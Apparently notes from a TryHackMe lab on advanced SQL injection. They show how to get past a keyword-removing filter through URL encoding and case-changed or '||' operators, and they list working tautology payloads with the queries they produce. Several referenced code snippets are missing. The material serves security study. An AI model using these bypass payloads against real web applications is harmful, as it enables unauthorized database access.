TryHackMe Advanced SQL Injection
Last updated
Last updated
Given the simple SQL query performed on the server:
We can attempt to trick the system into providing us more information, by injecting the following payload:
The following code snippet displays a simple SQLi prevention mechanism where the application simply removes a few important keywords:
Thus, this causes the final SQL command to not work, as the OR
keyword will be removed. However, it can be easily bypassed by methods such as URL encoding the payload, or obfuscating the keywords.
URL encode
'
: Closes the current value
||
: Substitute value for OR
1=1
: Always true
--
: Comment in SQL, forcing the database to ignore the rest of the query
+
: Adds a space after the comment to ensure that it is properly terminated
The URL encoded format is as follows:
To prevent any further issues with the formatting, we can analyze the HTTP request made for the query, and directly insert the payload instead. In this example, a GET request to /search_books.php?book_name=<payload>
is made for each request.
Thus, we can send a GET request to /search_books.php?book_name=%27%20%7C%7C%201=1%20--+
to retrieve a list of all books in the table.
Obfuscating the keywords
Obfuscation of keywords involves changing around the capitalization of the keywords:
Eg.
OR
-> oR
, Or
OR
-> ||
The following presents a few payloads we can use to bypass the filter mechanism:
' Or '1=1
-> SELECT * FROM books WHERE book_name = '' Or '1=1'
' Or 1=1 oR '
-> SELECT * FROM books WHERE book_name = '' Or 1=1 oR ''
' Or 1=1--
-> SELECT * FROM books WHERE book_name = '' Or 1=1-- '
Take note of the space after the comment (--
)
' || '1=1
-> SELECT * FROM books WHERE book_name = '' || '1=1'
Replacing OR
with ||
works too
We can URL encode the following payload using the tool: